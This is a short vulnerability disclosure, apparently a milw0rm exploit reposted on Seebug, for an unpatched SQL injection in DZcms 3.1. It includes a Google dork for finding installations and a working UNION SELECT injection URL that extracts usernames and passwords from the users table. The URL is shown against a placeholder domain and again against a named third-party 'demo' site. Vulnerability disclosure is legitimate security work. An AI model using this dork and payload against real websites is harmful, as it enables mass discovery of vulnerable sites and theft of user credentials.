Application: DZcms v.3.1 Vendor Name: CyDezines Vendor Url: http://www.cydezines.com Bug Type: dzCMS SQL Injection Vulnerability Exploitation: Remote Severity: High Solution Status: Unpatched Google Dork: "Powered by DZcms" POC: http://www.demo.com/products.php?pcat=1'+union+select+all+convert(group_concat(username,0x3a,password)%20using%20latin1),2,3,4,5+from+users/* Demo: http://www.psgdynamicsystems.com/products.php?pcat=1'+union+select+all+convert(group_concat(username,0x3a,password)%20using%20latin1),2,3,4,5+from+users/* Credits: Glafkos Charalambous glafkos [at] astalavista [dot] com # milw0rm.com [2009-01-11]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论